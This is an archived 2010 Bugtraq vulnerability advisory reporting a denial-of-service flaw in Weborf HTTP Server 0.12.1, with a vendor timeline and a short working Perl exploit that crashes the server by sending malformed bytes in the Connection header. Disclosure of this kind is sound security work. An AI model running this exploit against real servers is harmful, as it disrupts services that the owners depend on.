| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AANLkTilHRIB1f3f-MbosIuAPRYUGox8hkCcpbQNxLJOn@mail.gmail.com>
Date: Wed, 23 Jun 2010 09:08:12 -0300
From: Ewerson GuimarĂ£es (Crash) - Dclabs <crash@...abs.com.br>
To: bugtraq@...urityfocus.com
Subject: Weborf DCA-00012 Vulnerability Report
[DCA-0012]
[Software]
- Weborf HTTP Server
[Vendor Product Description]
- Weborf is a lightweight Web server written in C. It supports IPv6
and basic authentication. It doesn't implement the full HTTP
specification, but can be used to easily share directories or files.
[Bug Description]
- Weborf HTTP Server can't handle unicode characters in "Connection: "
general header-field leading to a Denial-of-Service flaw
[History]
- Advisory sent to vendor on 06/21/2010.
- Vendor reply 06/22/2010.
- Vendor patch published 06/23/2010
[Impact]
- Low
[Affected Version]
-Weborf 0.12.1
- Prior versions may also be vulnerable.
[Exploit]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET / HTTP/1.0\r\n";
print $socket "Connection: ". "\0x99" x 4 ."\r\n\r\n";
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
----------------------------------------------------------------------------------------
DcLabs Security Group
Sponsor: ipax
ipax@...abs.com.br
[Credits]
Crash and all DcLabs members.
Powered by blists - more mailing lists